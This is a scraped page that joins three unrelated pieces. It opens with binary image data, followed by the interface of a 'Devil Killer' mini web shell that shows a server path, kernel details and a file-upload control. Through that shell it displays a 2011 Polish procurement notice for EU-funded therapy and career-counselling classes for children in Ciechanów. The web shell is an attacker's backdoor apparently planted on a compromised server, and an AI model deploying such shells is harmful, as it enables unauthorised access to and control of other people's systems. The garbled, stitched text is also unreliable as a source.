JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111014/337034-N-2011.html

<p class="kh_header"><b>Ciechanów: Na realizację zajęć w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych</b><br>
<b>Numer ogłoszenia: 337034 - 2011; data zamieszczenia: 14.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna w Ciechanowie , ul. Wyzwolenia 10a, 06-400 Ciechanów, woj. mazowieckie, tel. 023 672 26 73, faks 023 672 26 73.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na realizację zajęć w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zajęć w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych 


Część I.

Prowadzenie przez dwóch terapeutów zajęć  stymulujących  dla uczniów z klas II szkół podstawowych z terenu powiatu ciechanowskiego  w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .

Termin realizacji - od czasu podpisania umowy do 30.06.2012 r. 
Ilość godzin (dla jednego terapeuty): łącznie - 68 godzin , w tym:
- spotkanie dla rodziców (wstępne): 1 godzina 
- diagnoza wstępna (4 dzieci)- 8 godzin
- współprowadzenie zajęć stymulujących z dziećmi: 50 godzin, w tym 20 godzin do realizacji do  dnia 10 grudnia 2011r.
- diagnoza końcowa (4 dzieci) - 8 godzin
- spotkanie podsumowujące dla rodziców: 1godzina.
Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.

Do Wykonawców zamówienia publicznego należy :
1)	Zorganizowanie i współprowadzenie zajęć stymulujących dla uczniów klas II szkoły podstawowej dla 8 osobowej grupy dzieci.
2)	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3)	Zorganizowanie i współprowadzenie spotkania wstępnego, informacyjnego 
dla rodziców.
4)	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
5)	Opracowanie wspólnie z drugim terapeutą narzędzi do diagnozy rezultatów określonych w pkt. 10.
6)	Przeprowadzenie indywidualnej wstępnej diagnozy 4 dzieci zakwalifikowanych 
do udziału w zajęciach w oparciu o opracowane przez siebie narzędzia diagnostyczne pozwalające na  ocenę wymaganych rezultatów opisanych w pkt. 10 (2 godziny  na dziecko)
7)	Współprowadzenie  25  zajęć po 2 godziny - przez każdego z terapeutów. 
8)	Przeprowadzenie diagnozy końcowej (oceny postępów) w oparciu o opracowane przez siebie narzędzia diagnostyczne pozwalające na  ocenę wymaganych rezultatów opisanych w pkt. 10 - indywidualnej dla 4 dzieci (2 godziny  na dziecko)
9)	Zorganizowanie i współprowadzenie spotkania podsumowującego dla rodziców
10)	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 8 dzieci, w tym 4 dziewcząt.
11)	Osiągnięcie wymaganego rezultatu u minimum 50% dzieci objętych zajęciami polegającego na zwiększeniu sprawności funkcji percepcyjno- motorycznych, poprawie orientacji w schemacie ciała i w przestrzeni, poprawie zdolności operacyjnego rozumowania
12)	Prowadzenie listy obecności dla rodziców uczestniczących w spotkaniach z rodzicami
13)	Bieżące prowadzenie Dziennika zajęć, odnotowywanie w Dzienniku informacji dot. postępów dzieci.
14)	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
15)	Opracowanie programu pracy z grupą.
16)	Dokonanie analizy porównawczej diagnoz początkowych i końcowych oraz przedstawienie ich w formie pisemnej nie później niż w ciągu 4 dni od zakończenia zajęć
17)	Współpraca z kadrą projektu
18)	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu
19)	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
20)	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
21)	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcom:
1.	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
2.	Minimum 2-letnie doświadczenie w pracy z dziećmi 
3.	Minimum 2- letnie doświadczenie w dokonywaniu diagnozy dzieci i programowaniu pracy w oparciu o dokonaną diagnozę.
4.	Umiejętność dokonywania ewaluacji prowadzonych zajęć.

CZĘŚĆ II.

Zorganizowanie i przeprowadzenie przez doradcę zawodowego zajęć  zakresu doradztwa zawodowego Moja przyszłość dla gimnazjalistów  w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .

Termin realizacji - od podpisania umowy do 30.05.2012 r. 
Ilość godzin- łącznie 58  godzin, w tym:
- poprowadzenie 8 spotkań dla rodziców (po 1,5 godziny każde) - 12 godzin , w tym                   3 spotkania  w 2011r.
przeprowadzenie zajęć z młodzieżą na terenie gimnazjów powiatu ciechanowskiego: 46godzin , w tym 16 godzin  w 2011r.

Realizacja zadania na terenie gimnazjów w powiecie ciechanowskim, w terminach i godzinach ustalonych z dyrektorami szkół.

Do Wykonawcy  zamówienia publicznego  - doradcy zawodowego należy: 
1) Przeprowadzenie rozmów z dyrektorami szkół i ustalenie we współpracy 
z dyrektorami harmonogramu realizacji zajęć.
2)	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3)	Opracowanie programu zajęć dla młodzieży.
4)	Zorganizowanie dla 8 grup rodziców spotkań informacyjnych.
5)	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
6)	Przeprowadzenie zajęć w 23 grupach uczniów i zapewnienie uczestnictwa 410 dzieci w zajęciach (w tym minimum 202 uczennic )
7)	Osiągnięcie wymaganych rezultatów poprzez wzrost umiejętności poznania swoich predyspozycji zawodowych oraz umiejętności pomocnych przy wyborze szkoły 
u 45 % objętych zadaniem, w tym u 45% dziewcząt i wykazanie ich w formie pisemnej.  
8)	Prowadzenie list obecności dla uczestników zajęć.
9)	Każdorazowe zbieranie list obecności podpisanych przez gimnazjalistów - uczestniczących w zajęciach
10)	Opracowanie ankiet dla uczestników zajęć pozwalających na określenie stopnia osiągnięcia rezultatów opisanych w pkt. 7.
11)	Przeprowadzenie ankiet  wśród uczestników pozwalających na ocenę stopnia osiągnięcia rezultatów określonych w pkt. 7.
12)	Prowadzenie listy obecności dla rodziców uczestniczących w spotkaniach z rodzicami.
13)	Promowanie projektu w trakcie spotkań z rodzicami.
14)	Opracowanie prezentacji multimedialnej wykorzystywanej w trakcie realizacji zajęć i przedłożenie do dokumentacji projektu spełniającej wymagania określone w pkt. 7 i 17. 
15)	Współpraca z kadrą projektu.
16)	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
17)	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
18)	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
19)	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć.

Wymagania stawiane przez Zamawiającego  Wykonawcom:
1.	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
2.	Posiadanie kwalifikacji w zakresie doradztwa zawodowego.
3.	Minimum 2-letnie doświadczenie w pracy z dziećmi. 
4.	Minimum 2- letnie doświadczenie w zakresie doradztwa  zawodowego.
5.	Umiejętność dokonywania ewaluacji prowadzonych zajęć.

CZĘŚĆ III.

Zorganizowanie i przeprowadzenie przez dwóch terapeutów zajęć  stymulujących  gotowość szkolną dla dzieci z klas 0 z terenu powiatu ciechanowskiego  w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .

Termin realizacji - 01.01.2012 r.  do 30.06.2012 r. 
Ilość godzin dla jednego terapeuty- łącznie 29 godzin, w tym:
- zorganizowanie i współprowadzenie spotkania organizacyjnego dla rodziców: 1godzina
- poprowadzenie zajęć dla dzieci- 26 godzin
- zorganizowanie i współprowadzenie spotkania podsumowującego dla rodziców: 2 godziny
Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.

Do Wykonawców zamówienia publicznego należy :
1)	Zorganizowanie i prowadzenie zajęć dla 8 osobowej grupy dzieci po 13 godzin zajęć  w grupach 2- osobowych.
2)	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie Zorganizowanie spotkania wstępnego, informacyjnego dla rodziców.
3)	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
4)	Poprowadzenie spotkania końcowego dla rodziców.
5)	Opracowanie we współpracy z drugim terapeutą narzędzi do diagnozy stopnia osiągnięcia rezultatów określonych w pkt. 8.
6)	 Zastosowanie co najmniej 2 razy (na początku i na końcu zajęć) opracowanych narzędzi do diagnozy stopnia osiągnięcia rezultatów opisanych w pkt. 8
7)	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 8 dzieci, w tym 4 dziewcząt.
8)	Osiągnięcie wymaganego rezultatu poprzez wzrost umiejętności wykorzystywania umiejętności intelektualnych w życiu u 50% dzieci objętych zajęciami oraz poprawa relacji z dorosłymi i rozwój zainteresowań u 25 % dzieci objętych zadaniem 
9)	Prowadzenie listy obecności dla rodziców uczestniczących w spotkaniach z rodzicami
10)	Bieżące prowadzenie  Dziennika zajęć, odnotowywanie w Dzienniku informacji dot.. postępów dzieci
11)	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
12)	Opracowanie programu pracy z każdą 2- osobową grupą.
13)	Dokonanie analizy porównawczej diagnoz /sprawdzianów początkowych i końcowych i przedstawienie ich w formie pisemnej nie później niż 4 dni od zakończeniu zajęć.
14)	Współpraca z kadrą projektu.
15)	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
16)	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
17)	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
18)	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcom:
1)	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
2)	Uprawnienia do pracy z dziećmi młodszymi (studia podyplomowe, kursy - minimum łącznie 100 godzin).
3)	Minimum 2-letnie doświadczenie w pracy z dziećmi.
4)	Minimum 2- letnie doświadczenie w pracy z dziećmi w wieku przedszkolnym.
5)	Umiejętność dokonywania ewaluacji prowadzonych zajęć

CZĘŚĆ IV.
                                                              
Zorganizowanie i przeprowadzenie przez terapeutę  terapii logopedycznej dla 8-ga dzieci   w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .
Termin realizacji: od podpisania umowy do 30 czerwca 2012 r.
Realizacja terapii logopedycznej przez 1 terapeutę w dwóch grupach:
1)	I grupa -   4 dzieci - od podpisania umowy do 31.01.2012 roku,
2)	II grupa - 4 dzieci - od 01.02.1012 do 30.06.2012 roku.
Ilość godzin w sumie dla 2 grup- 76 godzin, w tym:
- Dokonanie diagnozy wstępnej dzieci- 8 godzin
- Poprowadzenie zajęć z dziećmi- 60 godzin
- Dokonanie diagnozy końcowej- 8godzin.

Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.

Do Wykonawcy zamówienia publicznego  należy:
1.	Zorganizowanie i przeprowadzenie zajęć indywidualnych dla 4 dzieci od podpisania umowy do 31.01. 2012 roku   i  dla 4 dzieci od 01.02.2012 r.  do 30.06. 2012 r.. 
2.	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3.	Zajęcia indywidualne obejmują  dla każdej z grup - 10 spotkań po 45 minut.
4.	Opracowanie  narzędzi do oceny- diagnozy  umiejętności dziecka określonych w pkt. 8
5.	Przeprowadzenie diagnozy końcowej i początkowej wśród dzieci w oparciu o opracowane narzędzia diagnozy i udokumentowanie tego faktu.
6.	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji
7.	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 8 dzieci, w tym 2 dziewcząt.
8.	Osiągnięcie wymaganych rezultatów poprzez poprawę w realizacji korygowanych głosek i w zakresie percepcji słuchowej u 75% dzieci.
9.	Bieżące prowadzenie  Dziennika zajęć, odnotowywanie w Dzienniku informacji dot. postępów dzieci.
10.	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
11.	Opracowanie programu pracy z każdym dzieckiem
12.	Dokonanie analizy porównawczej diagnoz - sprawdzianów początkowych i końcowych, i przedstawienie ich w formie pisemnej nie później niż 4 dni od zakończeniu zajęć.
13.	Współpraca z kadrą projektu
14.	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
15.	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
16.	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
17.	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcom zamówienia publicznego:
1.	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
2.	Studia podyplomowe w zakresie logopedii lub kurs kwalifikacyjny w zakresie logopedii szkolnej.
3.	Minimum 2-letnie doświadczenie w pracy z dziećmi z wadami wymowy.
4.	Minimum 2- letnie doświadczenie w dokonywaniu diagnozy logopedycznej dzieci i programowaniu pracy w oparciu o dokonaną diagnozę. 
5.	Umiejętność dokonywania ewaluacji prowadzonych zajęć

CZĘŚĆ V.

Zorganizowanie i przeprowadzenie przez terapeutę zajęć  usprawniających percepcję wzrokową dla 6 grup dzieci z klas O i  z klas I szkół podstawowych z terenu powiatu ciechanowskiego w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .


Termin realizacji zajęć - od daty podpisania umowy do 30.06.2012 r.

Ilość godzin:  łącznie 174 godziny, w tym:
- dokonanie diagnozy wstępnej- 12 godzin
- przeprowadzenie zajęć z dziećmi- 150 godzin, w tym 54 godziny do realizacji do 10 grudnia 2011r.
-  Dokonanie diagnozy końcowej- 12 godzin.

Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.


Do Wykonawcy zamówienia publicznego należy :
1.	Zorganizowanie i przeprowadzenie zajęć dla 12 dzieci z klas O oraz klas I  w grupach 2-osobowych   25  godzin zajęć  (po 1godzinie  z każdą dwuosobową grupą).
2.	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3.	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
4.	Przeprowadzenie diagnozy wstępnej testem psychologicznym FROSTIG  - 1 godzina na każde dziecko
